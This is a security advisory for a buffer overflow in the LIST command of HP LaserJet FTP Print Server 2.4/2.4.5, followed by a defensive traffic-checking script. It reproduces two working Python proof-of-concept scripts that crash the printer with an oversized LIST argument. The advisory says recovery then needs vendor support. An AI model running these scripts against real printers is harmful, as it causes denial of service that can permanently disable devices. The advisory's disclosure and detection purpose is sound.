Security Vulnerability
HP LaserJet FTP Print Server LIST Command Buffer Overflow Vulnerability

Release date: 2006-12-19
Last updated: 2006-12-20

Affected systems:
HP LaserJet 5100 Series
HP LaserJet 5000 Series
HP FTP Print Server 2.4.5
HP FTP Print Server 2.4
Description:
BUGTRAQ  ID: 21666

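HP LaserJet is a series of laser printers from HP.

A vulnerability exists in the implementation of the HP LaserJet FTP print service. A remote attacker may be able to exploit it to carry out a denial-of-service attack against the printer, leaving the printer unable to work.

If the FTP print server is enabled, the HP printer may be affected by a buffer overflow vulnerability. If an attacker is able to send a LIST command with an overlong argument (approximately 256 characters), the overflow is triggered and a denial of service results. The printer remains unresponsive even after a restart, and a crashed printer can only be repaired by the vendor's technical support.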

<*Source: Joxean Koret (joxeankoret@yahoo.es)

  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=116655188816617&w=2
*>

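Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!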

["dos2.4.5.py" (dos2.4.5.py)]

#!/usr/bin/python

import sys
from ftplib import FTP

print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print

if len(sys.argv) == 1:
    print "Usage: %s <target>" % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

print "[+] Running attack against " + target

try:
    ftp = FTP(target)
except:
    print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
    sys.exit(0)
try:
    msg = ftp.login() # Login anonymously
    print msg
except:
    print "[!] Error logging anonymously.",sys.exc_info()[1]
    sys.exit(0)

buf = "./A"
iMax = 9

for i in range(iMax):
    buf += buf

print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... "

try:
    print "[+] Please, note that sometimes your connection will not be dropped. "
    ftp.retrlines("LIST " + buf[0:3000])
    print "[!] Exploit doesn't work :("
    print
    sys.exit(0)
except:
    print "[+] Apparently exploit works. Verifying ... "
    print sys.exc_info()[1]

ftp2 = FTP(target)

try:
    msg = ftp2.login()
    print "[!] No, it doesn't work :( "
    print
    print msg
    sys.exit(0)
except:
    print "[+] Yes, it works."
    print sys.exc_info()[1]

=========================================================================

["dos2.4.py" (dos2.4.py)]

#!/usr/bin/python

import sys
from ftplib import FTP

print "Hewlett-Packard FTP Print Server Version 2.4 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print

if len(sys.argv) == 1:
    print "Usage: %s <target>" % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

print "[+] Running attack against " + target

try:
    ftp = FTP(target)
except:
    print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
    sys.exit(0)
try:
    msg = ftp.login() # Login anonymously
    print msg
except:
    print "[!] Error logging anonymously.",sys.exc_info()[1]
    sys.exit(0)

iMax = 6
buf = "./A."

for i in range(iMax):
    buf += buf

print "[+] Sending buffer of",len(buf),"byte(s) ... "

try:
    print "[+] Please, note that sometimes your connection will not be dropped. "
    ftp.retrlines("LIST " + buf)
    print "[!] Exploit doesn't work :("
    print
    sys.exit(0)
except:
    print "[+] Apparently exploit works. Verifying ... "
    print sys.exc_info()[1]

ftp2 = FTP(target)

try:
    msg = ftp2.login()
    print "[!] No, it doesn't work :( "
    print
    print msg
    sys.exit(0)
except:
    print "[+] Yes, it works."
    print sys.exc_info()[1]

Recommendations:
Vendor patch:

HP
--
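The vendor has not yet provided a patch or upgrade. We recommend that users of this software keep watching the vendor's home page for the latest version: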

http://itrc.hp.com
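
Because no patch is available, the condition described above (a LIST command whose argument approaches 256 characters) can be checked for in captured FTP control-channel traffic. The following is an added example, not code from the advisory, its author or HP; the function names, the 200-character alert threshold and the sample session are assumptions made for illustration.

```python
import re

# Assumption: alert somewhat below the ~256-character figure in the advisory.
MAX_LIST_ARG = 200

# One FTP control-channel command: a 3-4 letter verb, then an optional
# single space followed by the argument.
_CMD = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?$", re.DOTALL)


def check_command(line, limit=MAX_LIST_ARG):
    """Return (verb, arg_len, flagged) for one client line, or None if unparsable."""
    m = _CMD.match(line.rstrip(b"\r\n"))
    if m is None:
        return None
    verb = m.group(1).upper().decode("ascii")  # FTP verbs are case-insensitive
    arg = m.group(2) or b""
    flagged = verb == "LIST" and len(arg) >= limit
    return verb, len(arg), flagged


def scan_session(lines, limit=MAX_LIST_ARG):
    """Return one finding per oversized LIST command in a captured session."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        result = check_command(raw, limit)
        if result and result[2]:
            findings.append({"line": lineno, "verb": result[0], "arg_len": result[1]})
    return findings


# Constructed sample of client-to-server lines (not taken from a real capture).
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@\r\n",
    b"LIST\r\n",
    b"LIST /jobs\r\n",
    b"list " + b"A" * 300 + b"\r\n",  # oversized argument, lower-case verb
    b"RETR report.ps\r\n",
]

if __name__ == "__main__":
    for finding in scan_session(SAMPLE_SESSION):
        print("line %(line)d: %(verb)s argument of %(arg_len)d bytes" % finding)
```

The same length check can be placed in an FTP-aware proxy or IDS rule in front of the printer; restricting access to the printer's FTP port has the same effect where FTP printing is not needed.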

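This security vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.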